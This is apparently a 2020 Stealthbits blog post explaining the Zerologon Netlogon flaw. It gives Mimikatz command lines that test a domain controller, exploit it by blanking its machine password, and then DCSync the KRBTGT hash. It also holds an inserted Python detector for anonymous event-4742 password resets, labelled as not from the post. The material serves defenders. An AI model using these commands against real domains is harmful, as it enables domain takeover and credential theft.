Stealthbits

Zerologon: From Zero to Hero – Part 2

By Kevin Joyce

How Does it Work?

In Part 1 of this blog series (What is Zerologon?), we discussed how Zerologon exploits a vulnerability in NetLogon that allows a malicious actor on your network to take over a Domain Controller (DC), and eventually your entire domain. Now let’s dive into the specifics of how Zerologon works.

Using Mimikatz to Execute the Zerologon Exploit

For starters, you can easily identify if a target domain controller is vulnerable to the Zerologon exploit with Mimikatz by running:

lsadump::Zerologon /target:sbpmlab-dc3 /account:sbpmlab-dc3$ /null /ntlm
Testing if a domain controller is vulnerable to Zerologon

If the check reports the domain controller as vulnerable, we can then run the same command, but add…

/exploit

…to actually exploit the vulnerability and change the Domain Controller’s password to an empty string.

Exploiting a vulnerable domain controller

As you can tell from the results after running the command, Mimikatz reports that it set the Domain Controller's machine account password. That can leave the DC in an unstable state, but it also leaves it in a state we can exploit. From here, an attacker can use Mimikatz to run a DCSync attack and obtain the hash of a domain admin account or of the KRBTGT account.

lsadump::dcsync /domain:sbpmlab.net /dc:sbpmlab-dc3 /user:krbtgt /authuser:sbpmlab-dc3$ /authdomain:sbpmlab /authpassword:"" /authntlm
Executing a DCSync post-Zerologon exploit

It's really that simple. In just a couple of steps, you can see how easy it is to exploit this vulnerability (provided a malicious actor can get onto your network and find a Domain Controller that is unpatched).

The biggest takeaway from this quick proof of concept should be that you must urgently patch your Domain Controllers with the August 11th security update, if you haven’t already.
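On the defender side, the /exploit step above leaves a trace in the targeted DC's own Security log: the machine account password reset is recorded as event 4742 with ANONYMOUS LOGON (SID S-1-5-7) as the subject. The following is an added example, not code from this post or from Stealthbits, that flags such records; the event XML samples are constructed, and the field names are the standard ones found in event 4742.

```python
"""Flag Security-log event 4742 records consistent with a Zerologon-style machine-account
password reset: a computer account target, a new PasswordLastSet value, and ANONYMOUS LOGON
(SID S-1-5-7) as the subject, which is how a null-authenticated Netlogon reset is recorded."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ANONYMOUS_LOGON_SID = "S-1-5-7"

def _event(event_id, fields):
    """Build a constructed Windows event XML record (sample data, not captured from a DC)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")

# Constructed samples: a Zerologon-like reset of the DC account, a routine computer-account
# change by an admin, and an anonymous change that did not set a new password.
SAMPLE_EVENTS = [
    _event(4742, {"SubjectUserSid": ANONYMOUS_LOGON_SID, "SubjectUserName": "ANONYMOUS LOGON",
                  "TargetUserName": "SBPMLAB-DC3$", "TargetDomainName": "SBPMLAB",
                  "PasswordLastSet": "9/15/2020 10:02:11 AM"}),
    _event(4742, {"SubjectUserSid": "S-1-5-21-1111-2222-3333-500", "SubjectUserName": "Administrator",
                  "TargetUserName": "WS01$", "TargetDomainName": "SBPMLAB", "PasswordLastSet": "-"}),
    _event(4742, {"SubjectUserSid": ANONYMOUS_LOGON_SID, "SubjectUserName": "ANONYMOUS LOGON",
                  "TargetUserName": "WS02$", "TargetDomainName": "SBPMLAB", "PasswordLastSet": "-"}),
]

def parse_event(xml_text):
    """Return (event_id, {Data Name: value}) from one event XML record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data

def is_zerologon_style_reset(xml_text):
    event_id, data = parse_event(xml_text)
    if event_id != 4742:
        return False
    target = data.get("TargetUserName", "")
    # Computer accounts end in '$'; PasswordLastSet of "-" means no password change in this record.
    if not target.endswith("$") or data.get("PasswordLastSet", "-") == "-":
        return False
    return data.get("SubjectUserSid") == ANONYMOUS_LOGON_SID

def suspicious_targets(events):
    return [parse_event(e)[1]["TargetUserName"] for e in events if is_zerologon_style_reset(e)]

if __name__ == "__main__":
    for account in suspicious_targets(SAMPLE_EVENTS):
        print(f"ALERT: anonymous password reset of {account}; investigate for Zerologon")
```

In production the same logic applies to records pulled from the DC's Security log (for example with Get-WinEvent and its XML output), and any hit on a domain controller's own account should be treated as a confirmed compromise rather than a lead.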

Zerologon Detection and Mitigation Solution

Alright, so we went over the new patch and update plans from Microsoft in Part 1, as well as the attack itself here in Part 2. In my next blog post, I'll spend a little time outlining how Stealthbits can help. Check it out!

© 2020 Stealthbits Technologies, Inc.